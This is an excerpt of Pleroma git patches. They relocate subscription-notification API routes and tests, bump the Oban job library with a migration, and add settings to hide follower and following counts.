+defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationView do
use Pleroma.Web, :view
alias Pleroma.Activity
alias Pleroma.User
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.MastodonAPI.AccountView
- alias Pleroma.Web.MastodonAPI.SubscriptionNotificationView
alias Pleroma.Web.MastodonAPI.StatusView
+ alias Pleroma.Web.PleromaAPI.SubscriptionNotificationView
def render("index.json", %{notifications: notifications, for: user}) do
safe_render_many(notifications, SubscriptionNotificationView, "show.json", %{for: user})
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 409fc9eca..05891b6c0 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -268,6 +268,14 @@ defmodule Pleroma.Web.Router do
pipe_through(:oauth_read)
get("/conversations/:id/statuses", PleromaAPIController, :conversation_statuses)
get("/conversations/:id", PleromaAPIController, :conversation)
+
+ scope "/subscription_notifications" do
+ post("/clear", SubscriptionNotificationController, :clear)
+ post("/dismiss", SubscriptionNotificationController, :dismiss)
+ delete("/destroy_multiple", SubscriptionNotificationController, :destroy_multiple)
+ get("/", SubscriptionNotificationController, :list)
+ get("/id", SubscriptionNotificationController, :get)
+ end
end
scope [] do
@@ -302,38 +310,13 @@ defmodule Pleroma.Web.Router do
post("/notifications/clear", MastodonAPIController, :clear_notifications)
- post(
- "/notifications/subscription/clear",
- MastodonAPIController,
- :clear_subscription_notifications
- )
-
post("/notifications/dismiss", MastodonAPIController, :dismiss_notification)
- post(
- "/notifications/subscription/dismiss",
- MastodonAPIController,
- :dismiss_subscription_notification
- )
-
get("/notifications", MastodonAPIController, :notifications)
- get("/notifications/subscription", MastodonAPIController, :subscription_notifications)
get("/notifications/:id", MastodonAPIController, :get_notification)
- get(
- "/notifications/subscription/:id",
- MastodonAPIController,
- :get_subscription_notification
- )
-
delete("/notifications/destroy_multiple", MastodonAPIController, :destroy_multiple)
- delete(
- "/notifications/subscription/destroy_multiple",
- MastodonAPIController,
- :destroy_multiple_subscription_notifications
- )
-
get("/scheduled_statuses", MastodonAPIController, :scheduled_statuses)
get("/scheduled_statuses/:id", MastodonAPIController, :show_scheduled_status)
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 1d2d9e134..fb04748bb 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -13,7 +13,6 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
alias Pleroma.Object
alias Pleroma.Repo
alias Pleroma.ScheduledActivity
- alias Pleroma.SubscriptionNotification
alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ActivityPub
@@ -1275,197 +1274,6 @@ test "see notifications after muting user with notifications and with_muted para
end
end
- describe "subscription_notifications" do
- setup do
- user = insert(:user)
- subscriber = insert(:user)
-
- User.subscribe(subscriber, user)
-
- {:ok, %{user: user, subscriber: subscriber}}
- end
-
- test "list of notifications", %{conn: conn, user: user, subscriber: subscriber} do
- status_text = "Hello"
- {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
-
- conn =
- conn
- |> assign(:user, subscriber)
- |> get("/api/v1/notifications/subscription")
-
- assert [%{"status" => %{"content" => response}} | _rest] = json_response(conn, 200)
- assert response == status_text
- end
-
- test "getting a single notification", %{conn: conn, user: user, subscriber: subscriber} do
- status_text = "Hello"
-
- {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
- [notification] = Repo.all(SubscriptionNotification)
-
- conn =
- conn
- |> assign(:user, subscriber)
- |> get("/api/v1/notifications/subscription/#{notification.id}")
-
- assert %{"status" => %{"content" => response}} = json_response(conn, 200)
- assert response == status_text
- end
-
- test "dismissing a single notification also deletes it", %{
- conn: conn,
- user: user,
- subscriber: subscriber
- } do
- status_text = "Hello"
- {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
-
- [notification] = Repo.all(SubscriptionNotification)
-
- conn =
- conn
- |> assign(:user, subscriber)
- |> post("/api/v1/notifications/subscription/dismiss", %{"id" => notification.id})
-
- assert %{} = json_response(conn, 200)
-
- assert Repo.all(SubscriptionNotification) == []
- end
-
- test "clearing all notifications also deletes them", %{
- conn: conn,
- user: user,
- subscriber: subscriber
- } do
- status_text1 = "Hello"
- status_text2 = "Hello again"
- {:ok, _activity1} = CommonAPI.post(user, %{"status" => status_text1})
- {:ok, _activity2} = CommonAPI.post(user, %{"status" => status_text2})
-
- conn =
- conn
- |> assign(:user, subscriber)
- |> post("/api/v1/notifications/subscription/clear")
-
- assert %{} = json_response(conn, 200)
-
- conn =
- build_conn()
- |> assign(:user, subscriber)
- |> get("/api/v1/notifications/subscription")
-
- assert json_response(conn, 200) == []
-
- assert Repo.all(SubscriptionNotification) == []
- end
-
- test "paginates notifications using min_id, since_id, max_id, and limit", %{
- conn: conn,
- user: user,
- subscriber: subscriber
- } do
- {:ok, activity1} = CommonAPI.post(user, %{"status" => "Hello 1"})
- {:ok, activity2} = CommonAPI.post(user, %{"status" => "Hello 2"})
- {:ok, activity3} = CommonAPI.post(user, %{"status" => "Hello 3"})
- {:ok, activity4} = CommonAPI.post(user, %{"status" => "Hello 4"})
-
- notification1_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity1.id).id |> to_string()
-
- notification2_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity2.id).id |> to_string()
-
- notification3_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity3.id).id |> to_string()
-
- notification4_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity4.id).id |> to_string()
-
- conn = assign(conn, :user, subscriber)
-
- # min_id
- conn_res =
- get(conn, "/api/v1/notifications/subscription?limit=2&min_id=#{notification1_id}")
-
- result = json_response(conn_res, 200)
- assert [%{"id" => ^notification3_id}, %{"id" => ^notification2_id}] = result
-
- # since_id
- conn_res =
- get(conn, "/api/v1/notifications/subscription?limit=2&since_id=#{notification1_id}")
-
- result = json_response(conn_res, 200)
- assert [%{"id" => ^notification4_id}, %{"id" => ^notification3_id}] = result
-
- # max_id
- conn_res =
- get(conn, "/api/v1/notifications/subscription?limit=2&max_id=#{notification4_id}")
-
- result = json_response(conn_res, 200)
- assert [%{"id" => ^notification3_id}, %{"id" => ^notification2_id}] = result
- end
-
- test "destroy multiple", %{conn: conn, user: user1, subscriber: user2} do
- # mutual subscription
- User.subscribe(user1, user2)
-
- {:ok, activity1} = CommonAPI.post(user1, %{"status" => "Hello 1"})
- {:ok, activity2} = CommonAPI.post(user1, %{"status" => "World 1"})
- {:ok, activity3} = CommonAPI.post(user2, %{"status" => "Hello 2"})
- {:ok, activity4} = CommonAPI.post(user2, %{"status" => "World 2"})
-
- notification1_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity1.id).id |> to_string()
-
- notification2_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity2.id).id |> to_string()
-
- notification3_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity3.id).id |> to_string()
-
- notification4_id =
- Repo.get_by(SubscriptionNotification, activity_id: activity4.id).id |> to_string()
-
- conn = assign(conn, :user, user1)
-
- conn_res = get(conn, "/api/v1/notifications/subscription")
-
- result = json_response(conn_res, 200)
-
- Enum.each(result, fn %{"id" => id} ->
- assert id in [notification3_id, notification4_id]
- end)
-
- conn2 = assign(conn, :user, user2)
-
- conn_res = get(conn2, "/api/v1/notifications/subscription")
-
- result = json_response(conn_res, 200)
-
- Enum.each(result, fn %{"id" => id} ->
- assert id in [notification1_id, notification2_id]
- end)
-
- conn_destroy =
- delete(conn, "/api/v1/notifications/subscription/destroy_multiple", %{
- "ids" => [notification3_id, notification4_id]
- })
-
- assert json_response(conn_destroy, 200) == %{}
-
- conn_res = get(conn2, "/api/v1/notifications/subscription")
-
- result = json_response(conn_res, 200)
-
- Enum.each(result, fn %{"id" => id} ->
- assert id in [notification1_id, notification2_id]
- end)
-
- assert length(Repo.all(SubscriptionNotification)) == 2
- end
- end
-
describe "reblogging" do
test "reblogs and returns the reblogged status", %{conn: conn} do
activity = insert(:note_activity)
diff --git a/test/web/pleroma_api/subscription_notification_controller_test.exs b/test/web/pleroma_api/subscription_notification_controller_test.exs
new file mode 100644
index 000000000..ee495f112
--- /dev/null
+++ b/test/web/pleroma_api/subscription_notification_controller_test.exs
@@ -0,0 +1,234 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationControllerTest do
+ use Pleroma.Web.ConnCase
+
+ alias Pleroma.Repo
+ alias Pleroma.SubscriptionNotification
+ alias Pleroma.User
+ alias Pleroma.Web.CommonAPI
+ import Pleroma.Factory
+ import Tesla.Mock
+
+ setup do
+ mock(fn env -> apply(HttpRequestMock, :request, [env]) end)
+ :ok
+ end
+
+ clear_config([:instance, :public])
+ clear_config([:rich_media, :enabled])
+
+ describe "subscription_notifications" do
+ setup do
+ user = insert(:user)
+ subscriber = insert(:user)
+
+ User.subscribe(subscriber, user)
+
+ {:ok, %{user: user, subscriber: subscriber}}
+ end
+
+ test "list of notifications", %{conn: conn, user: user, subscriber: subscriber} do
+ status_text = "Hello"
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
+ path = subscription_notification_path(conn, :list)
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> get(path)
+
+ assert [%{"status" => %{"content" => response}} | _rest] = json_response(conn, 200)
+ assert response == status_text
+ end
+
+ test "getting a single notification", %{conn: conn, user: user, subscriber: subscriber} do
+ status_text = "Hello"
+
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
+ [notification] = Repo.all(SubscriptionNotification)
+
+ path = subscription_notification_path(conn, :get, id: notification.id)
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> get(path)
+
+ assert %{"status" => %{"content" => response}} = json_response(conn, 200)
+ assert response == status_text
+ end
+
+ test "dismissing a single notification also deletes it", %{
+ conn: conn,
+ user: user,
+ subscriber: subscriber
+ } do
+ status_text = "Hello"
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
+
+ [notification] = Repo.all(SubscriptionNotification)
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> post(subscription_notification_path(conn, :dismiss), %{"id" => notification.id})
+
+ assert %{} = json_response(conn, 200)
+
+ assert Repo.all(SubscriptionNotification) == []
+ end
+
+ test "clearing all notifications also deletes them", %{
+ conn: conn,
+ user: user,
+ subscriber: subscriber
+ } do
+ status_text1 = "Hello"
+ status_text2 = "Hello again"
+ {:ok, _activity1} = CommonAPI.post(user, %{"status" => status_text1})
+ {:ok, _activity2} = CommonAPI.post(user, %{"status" => status_text2})
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> post(subscription_notification_path(conn, :clear))
+
+ assert %{} = json_response(conn, 200)
+
+ conn =
+ build_conn()
+ |> assign(:user, subscriber)
+ |> get(subscription_notification_path(conn, :list))
+
+ assert json_response(conn, 200) == []
+
+ assert Repo.all(SubscriptionNotification) == []
+ end
+
+ test "paginates notifications using min_id, since_id, max_id, and limit", %{
+ conn: conn,
+ user: user,
+ subscriber: subscriber
+ } do
+ {:ok, activity1} = CommonAPI.post(user, %{"status" => "Hello 1"})
+ {:ok, activity2} = CommonAPI.post(user, %{"status" => "Hello 2"})
+ {:ok, activity3} = CommonAPI.post(user, %{"status" => "Hello 3"})
+ {:ok, activity4} = CommonAPI.post(user, %{"status" => "Hello 4"})
+
+ notification1_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity1.id).id |> to_string()
+
+ notification2_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity2.id).id |> to_string()
+
+ notification3_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity3.id).id |> to_string()
+
+ notification4_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity4.id).id |> to_string()
+
+ conn = assign(conn, :user, subscriber)
+
+ # min_id
+ conn_res =
+ get(
+ conn,
+ subscription_notification_path(conn, :list, %{
+ "limit" => 2,
+ "min_id" => notification1_id
+ })
+ )
+
+ result = json_response(conn_res, 200)
+ assert [%{"id" => ^notification3_id}, %{"id" => ^notification2_id}] = result
+
+ # since_id
+ conn_res =
+ get(
+ conn,
+ subscription_notification_path(conn, :list, %{
+ "limit" => 2,
+ "since_id" => notification1_id
+ })
+ )
+
+ result = json_response(conn_res, 200)
+ assert [%{"id" => ^notification4_id}, %{"id" => ^notification3_id}] = result
+
+ # max_id
+ conn_res =
+ get(
+ conn,
+ subscription_notification_path(conn, :list, %{
+ "limit" => 2,
+ "max_id" => notification4_id
+ })
+ )
+
+ result = json_response(conn_res, 200)
+ assert [%{"id" => ^notification3_id}, %{"id" => ^notification2_id}] = result
+ end
+
+ test "destroy multiple", %{conn: conn, user: user1, subscriber: user2} do
+ # mutual subscription
+ User.subscribe(user1, user2)
+
+ {:ok, activity1} = CommonAPI.post(user1, %{"status" => "Hello 1"})
+ {:ok, activity2} = CommonAPI.post(user1, %{"status" => "World 1"})
+ {:ok, activity3} = CommonAPI.post(user2, %{"status" => "Hello 2"})
+ {:ok, activity4} = CommonAPI.post(user2, %{"status" => "World 2"})
+
+ notification1_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity1.id).id |> to_string()
+
+ notification2_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity2.id).id |> to_string()
+
+ notification3_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity3.id).id |> to_string()
+
+ notification4_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity4.id).id |> to_string()
+
+ conn = assign(conn, :user, user1)
+
+ conn_res = get(conn, subscription_notification_path(conn, :list))
+
+ result = json_response(conn_res, 200)
+
+ Enum.each(result, fn %{"id" => id} ->
+ assert id in [notification3_id, notification4_id]
+ end)
+
+ conn2 = assign(conn, :user, user2)
+
+ conn_res = get(conn2, subscription_notification_path(conn, :list))
+
+ result = json_response(conn_res, 200)
+
+ Enum.each(result, fn %{"id" => id} ->
+ assert id in [notification1_id, notification2_id]
+ end)
+
+ conn_destroy =
+ delete(conn, subscription_notification_path(conn, :destroy_multiple), %{
+ "ids" => [notification3_id, notification4_id]
+ })
+
+ assert json_response(conn_destroy, 200) == %{}
+
+ conn_res = get(conn2, subscription_notification_path(conn, :list))
+
+ result = json_response(conn_res, 200)
+
+ Enum.each(result, fn %{"id" => id} ->
+ assert id in [notification1_id, notification2_id]
+ end)
+
+ assert length(Repo.all(SubscriptionNotification)) == 2
+ end
+ end
+end
From a21584556f2c3edb90db3c58ba2a4829a7e220c1 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Tue, 17 Sep 2019 13:04:43 +0300
Subject: [PATCH 086/272] Update oban to 0.8.1
This version uses a different locking mechanism, which gets rid of
`WARNING: you don't own a lock of type ShareLock` log spam
---
lib/pleroma/flake_id.ex | 2 +-
mix.exs | 2 +-
mix.lock | 8 ++++----
priv/repo/migrations/20190917100019_update_oban.exs | 11 +++++++++++
4 files changed, 17 insertions(+), 6 deletions(-)
create mode 100644 priv/repo/migrations/20190917100019_update_oban.exs
diff --git a/lib/pleroma/flake_id.ex b/lib/pleroma/flake_id.ex
index 47d61ca5f..042cf8659 100644
--- a/lib/pleroma/flake_id.ex
+++ b/lib/pleroma/flake_id.ex
@@ -14,7 +14,7 @@ defmodule Pleroma.FlakeId do
@type t :: binary
- @behaviour Ecto.Type
+ use Ecto.Type
use GenServer
require Logger
alias __MODULE__
diff --git a/mix.exs b/mix.exs
index 911ebad1d..230f90244 100644
--- a/mix.exs
+++ b/mix.exs
@@ -101,7 +101,7 @@ defp deps do
{:phoenix_ecto, "~> 4.0"},
{:ecto_sql, "~> 3.1"},
{:postgrex, ">= 0.13.5"},
- {:oban, "~> 0.7"},
+ {:oban, "~> 0.8.1"},
{:quantum, "~> 2.3"},
{:gettext, "~> 0.15"},
{:comeonin, "~> 4.1.1"},
diff --git a/mix.lock b/mix.lock
index 0bf6a811e..547ff6be6 100644
--- a/mix.lock
+++ b/mix.lock
@@ -21,8 +21,8 @@
"decimal": {:hex, :decimal, "1.8.0", "ca462e0d885f09a1c5a342dbd7c1dcf27ea63548c65a65e67334f4b61803822e", [:mix], [], "hexpm"},
"deep_merge": {:hex, :deep_merge, "1.0.0", "b4aa1a0d1acac393bdf38b2291af38cb1d4a52806cf7a4906f718e1feb5ee961", [:mix], [], "hexpm"},
"earmark": {:hex, :earmark, "1.3.6", "ce1d0675e10a5bb46b007549362bd3f5f08908843957687d8484fe7f37466b19", [:mix], [], "hexpm"},
- "ecto": {:hex, :ecto, "3.1.4", "69d852da7a9f04ede725855a35ede48d158ca11a404fe94f8b2fb3b2162cd3c9", [:mix], [{:decimal, "~> 1.6", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
- "ecto_sql": {:hex, :ecto_sql, "3.1.3", "2c536139190492d9de33c5fefac7323c5eaaa82e1b9bf93482a14649042f7cd9", [:mix], [{:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:ecto, "~> 3.1.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:mariaex, "~> 0.9.1", [hex: :mariaex, repo: "hexpm", optional: true]}, {:myxql, "~> 0.2.0", [hex: :myxql, repo: "hexpm", optional: true]}, {:postgrex, "~> 0.14.0", [hex: :postgrex, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.4.0", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
+ "ecto": {:hex, :ecto, "3.2.0", "940e2598813f205223d60c78d66e514afe1db5167ed8075510a59e496619cfb5", [:mix], [{:decimal, "~> 1.6", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
+ "ecto_sql": {:hex, :ecto_sql, "3.2.0", "751cea597e8deb616084894dd75cbabfdbe7255ff01e8c058ca13f0353a3921b", [:mix], [{:db_connection, "~> 2.1", [hex: :db_connection, repo: "hexpm", optional: false]}, {:ecto, "~> 3.2.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:myxql, "~> 0.2.0", [hex: :myxql, repo: "hexpm", optional: true]}, {:postgrex, "~> 0.15.0", [hex: :postgrex, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.4.0", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
"esshd": {:hex, :esshd, "0.1.0", "6f93a2062adb43637edad0ea7357db2702a4b80dd9683482fe00f5134e97f4c1", [:mix], [], "hexpm"},
"eternal": {:hex, :eternal, "1.2.0", "e2a6b6ce3b8c248f7dc31451aefca57e3bdf0e48d73ae5043229380a67614c41", [:mix], [], "hexpm"},
"ex2ms": {:hex, :ex2ms, "1.5.0", "19e27f9212be9a96093fed8cdfbef0a2b56c21237196d26760f11dfcfae58e97", [:mix], [], "hexpm"},
@@ -60,7 +60,7 @@
"mogrify": {:hex, :mogrify, "0.6.1", "de1b527514f2d95a7bbe9642eb556061afb337e220cf97adbf3a4e6438ed70af", [:mix], [], "hexpm"},
"mox": {:hex, :mox, "0.5.1", "f86bb36026aac1e6f924a4b6d024b05e9adbed5c63e8daa069bd66fb3292165b", [:mix], [], "hexpm"},
"nimble_parsec": {:hex, :nimble_parsec, "0.5.1", "c90796ecee0289dbb5ad16d3ad06f957b0cd1199769641c961cfe0b97db190e0", [:mix], [], "hexpm"},
- "oban": {:hex, :oban, "0.7.1", "171bdd1b69c1a4a839f8c768f5e962fc22d1de1513d459fb6b8e0cbd34817a9a", [:mix], [{:ecto_sql, "~> 3.1", [hex: :ecto_sql, repo: "hexpm", optional: false]}, {:jason, "~> 1.1", [hex: :jason, repo: "hexpm", optional: false]}, {:postgrex, "~> 0.14", [hex: :postgrex, repo: "hexpm", optional: false]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
+ "oban": {:hex, :oban, "0.8.1", "4bbf62eb1829f856d69aeb5069ac7036afe07db8221a17de2a9169cc7a58a318", [:mix], [{:ecto_sql, "~> 3.1", [hex: :ecto_sql, repo: "hexpm", optional: false]}, {:jason, "~> 1.1", [hex: :jason, repo: "hexpm", optional: false]}, {:postgrex, "~> 0.14", [hex: :postgrex, repo: "hexpm", optional: false]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
"parse_trans": {:hex, :parse_trans, "3.3.0", "09765507a3c7590a784615cfd421d101aec25098d50b89d7aa1d66646bc571c1", [:rebar3], [], "hexpm"},
"pbkdf2_elixir": {:hex, :pbkdf2_elixir, "0.12.3", "6706a148809a29c306062862c803406e88f048277f6e85b68faf73291e820b84", [:mix], [], "hexpm"},
"phoenix": {:hex, :phoenix, "1.4.9", "746d098e10741c334d88143d3c94cab1756435f94387a63441792e66ec0ee974", [:mix], [{:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}, {:phoenix_pubsub, "~> 1.1", [hex: :phoenix_pubsub, repo: "hexpm", optional: false]}, {:plug, "~> 1.8.1 or ~> 1.9", [hex: :plug, repo: "hexpm", optional: false]}, {:plug_cowboy, "~> 1.0 or ~> 2.0", [hex: :plug_cowboy, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
@@ -74,7 +74,7 @@
"plug_static_index_html": {:hex, :plug_static_index_html, "1.0.0", "840123d4d3975585133485ea86af73cb2600afd7f2a976f9f5fd8b3808e636a0", [:mix], [{:plug, "~> 1.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"poison": {:hex, :poison, "3.1.0", "d9eb636610e096f86f25d9a46f35a9facac35609a7591b3be3326e99a0484665", [:mix], [], "hexpm"},
"poolboy": {:hex, :poolboy, "1.5.2", "392b007a1693a64540cead79830443abf5762f5d30cf50bc95cb2c1aaafa006b", [:rebar3], [], "hexpm"},
- "postgrex": {:hex, :postgrex, "0.14.3", "5754dee2fdf6e9e508cbf49ab138df964278700b764177e8f3871e658b345a1e", [:mix], [{:connection, "~> 1.0", [hex: :connection, repo: "hexpm", optional: false]}, {:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:decimal, "~> 1.5", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
+ "postgrex": {:hex, :postgrex, "0.15.1", "23ce3417de70f4c0e9e7419ad85bdabcc6860a6925fe2c6f3b1b5b1e8e47bf2f", [:mix], [{:connection, "~> 1.0", [hex: :connection, repo: "hexpm", optional: false]}, {:db_connection, "~> 2.1", [hex: :db_connection, repo: "hexpm", optional: false]}, {:decimal, "~> 1.5", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
"prometheus": {:hex, :prometheus, "4.4.1", "1e96073b3ed7788053768fea779cbc896ddc3bdd9ba60687f2ad50b252ac87d6", [:mix, :rebar3], [], "hexpm"},
"prometheus_ecto": {:hex, :prometheus_ecto, "1.4.1", "6c768ea9654de871e5b32fab2eac348467b3021604ebebbcbd8bcbe806a65ed5", [:mix], [{:ecto, "~> 2.0 or ~> 3.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:prometheus_ex, "~> 1.1 or ~> 2.0 or ~> 3.0", [hex: :prometheus_ex, repo: "hexpm", optional: false]}], "hexpm"},
"prometheus_ex": {:hex, :prometheus_ex, "3.0.5", "fa58cfd983487fc5ead331e9a3e0aa622c67232b3ec71710ced122c4c453a02f", [:mix], [{:prometheus, "~> 4.0", [hex: :prometheus, repo: "hexpm", optional: false]}], "hexpm"},
diff --git a/priv/repo/migrations/20190917100019_update_oban.exs b/priv/repo/migrations/20190917100019_update_oban.exs
new file mode 100644
index 000000000..157dc54f9
--- /dev/null
+++ b/priv/repo/migrations/20190917100019_update_oban.exs
@@ -0,0 +1,11 @@
+defmodule Pleroma.Repo.Migrations.UpdateOban do
+ use Ecto.Migration
+
+ def up do
+ Oban.Migrations.up(version: 4)
+ end
+
+ def down do
+ Oban.Migrations.down(version: 2)
+ end
+end
From 450bf7a63c39c2301d5985448a867e77f1dfe3b3 Mon Sep 17 00:00:00 2001
From: eugenijm
Date: Fri, 13 Sep 2019 17:37:30 +0300
Subject: [PATCH 087/272] Mastodon API: Add a setting to hide follow/follower
count from the user view (`hide_follows_count` and `hide_followers_count`)
---
CHANGELOG.md | 1 +
docs/api/differences_in_mastoapi_responses.md | 4 +++
lib/pleroma/user/info.ex | 14 ++++++--
.../web/activity_pub/views/user_view.ex | 32 +++++++++++--------
.../controllers/mastodon_api_controller.ex | 2 ++
.../web/mastodon_api/views/account_view.ex | 14 ++++++--
.../web/activity_pub/views/user_view_test.exs | 24 ++++++++++++--
.../update_credentials_test.exs | 16 ++++++++++
.../mastodon_api/views/account_view_test.exs | 31 ++++++++++++++++--
9 files changed, 117 insertions(+), 21 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 4eb72c002..7dfa477b4 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -94,6 +94,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Mastodon API: added `/auth/password` endpoint for password reset with rate limit.
- Mastodon API: /api/v1/accounts/:id/statuses now supports nicknames or user id
- Mastodon API: Improve support for the user profile custom fields
+- Mastodon API: follower/following counters are nullified when `hide_follows`/`hide_followers` and `hide_follows_count`/`hide_followers_count` are set
- Admin API: Return users' tags when querying reports
- Admin API: Return avatar and display name when querying users
- Admin API: Allow querying user by ID
diff --git a/docs/api/differences_in_mastoapi_responses.md b/docs/api/differences_in_mastoapi_responses.md
index 9b32baf3a..3c7f5dad7 100644
--- a/docs/api/differences_in_mastoapi_responses.md
+++ b/docs/api/differences_in_mastoapi_responses.md
@@ -50,6 +50,8 @@ Has these additional fields under the `pleroma` object:
- `confirmation_pending`: boolean, true if a new user account is waiting on email confirmation to be activated
- `hide_followers`: boolean, true when the user has follower hiding enabled
- `hide_follows`: boolean, true when the user has follow hiding enabled
+- `hide_followers_count`: boolean, true when the user has follower stat hiding enabled
+- `hide_follows_count`: boolean, true when the user has follow stat hiding enabled
- `settings_store`: A generic map of settings for frontends. Opaque to the backend. Only returned in `verify_credentials` and `update_credentials`
- `chat_token`: The token needed for Pleroma chat. Only returned in `verify_credentials`
- `deactivated`: boolean, true when the user is deactivated
@@ -112,6 +114,8 @@ Additional parameters can be added to the JSON body/Form data:
- `no_rich_text` - if true, html tags are stripped from all statuses requested from the API
- `hide_followers` - if true, user's followers will be hidden
- `hide_follows` - if true, user's follows will be hidden
+- `hide_followers_count` - if true, user's follower count will be hidden
+- `hide_follows_count` - if true, user's follow count will be hidden
- `hide_favorites` - if true, user's favorites timeline will be hidden
- `show_role` - if true, user's role (e.g admin, moderator) will be exposed to anyone in the API
- `default_scope` - the scope returned under `privacy` key in Source subentity
diff --git a/lib/pleroma/user/info.ex b/lib/pleroma/user/info.ex
index 151e025de..b150a57cd 100644
--- a/lib/pleroma/user/info.ex
+++ b/lib/pleroma/user/info.ex
@@ -41,6 +41,8 @@ defmodule Pleroma.User.Info do
field(:topic, :string, default: nil)
field(:hub, :string, default: nil)
field(:salmon, :string, default: nil)
+ field(:hide_followers_count, :boolean, default: false)
+ field(:hide_follows_count, :boolean, default: false)
field(:hide_followers, :boolean, default: false)
field(:hide_follows, :boolean, default: false)
field(:hide_favorites, :boolean, default: true)
@@ -262,6 +264,8 @@ def remote_user_creation(info, params) do
:salmon,
:hide_followers,
:hide_follows,
+ :hide_followers_count,
+ :hide_follows_count,
:follower_count,
:fields,
:following_count
@@ -281,7 +285,9 @@ def user_upgrade(info, params, remote? \\ false) do
:following_count,
:hide_follows,
:fields,
- :hide_followers
+ :hide_followers,
+ :hide_followers_count,
+ :hide_follows_count
])
|> validate_fields(remote?)
end
@@ -295,6 +301,8 @@ def profile_update(info, params) do
:banner,
:hide_follows,
:hide_followers,
+ :hide_followers_count,
+ :hide_follows_count,
:hide_favorites,
:background,
:show_role,
@@ -458,7 +466,9 @@ def follow_information_update(info, params) do
:hide_followers,
:hide_follows,
:follower_count,
- :following_count
+ :following_count,
+ :hide_followers_count,
+ :hide_follows_count
])
end
end
diff --git a/lib/pleroma/web/activity_pub/views/user_view.ex b/lib/pleroma/web/activity_pub/views/user_view.ex
index 7be734b26..164b973d0 100644
--- a/lib/pleroma/web/activity_pub/views/user_view.ex
+++ b/lib/pleroma/web/activity_pub/views/user_view.ex
@@ -118,30 +118,34 @@ def render("user.json", %{user: user}) do
end
def render("following.json", %{user: user, page: page} = opts) do
- showing = (opts[:for] && opts[:for] == user) || !user.info.hide_follows
+ showing_items = (opts[:for] && opts[:for] == user) || !user.info.hide_follows
+ showing_count = showing_items || !user.info.hide_follows_count
+
query = User.get_friends_query(user)
query = from(user in query, select: [:ap_id])
following = Repo.all(query)
total =
- if showing do
+ if showing_count do
length(following)
else
0
end
- collection(following, "#{user.ap_id}/following", page, showing, total)
+ collection(following, "#{user.ap_id}/following", page, showing_items, total)
|> Map.merge(Utils.make_json_ld_header())
end
def render("following.json", %{user: user} = opts) do
- showing = (opts[:for] && opts[:for] == user) || !user.info.hide_follows
+ showing_items = (opts[:for] && opts[:for] == user) || !user.info.hide_follows
+ showing_count = showing_items || !user.info.hide_follows_count
+
query = User.get_friends_query(user)
query = from(user in query, select: [:ap_id])
following = Repo.all(query)
total =
- if showing do
+ if showing_count do
length(following)
else
0
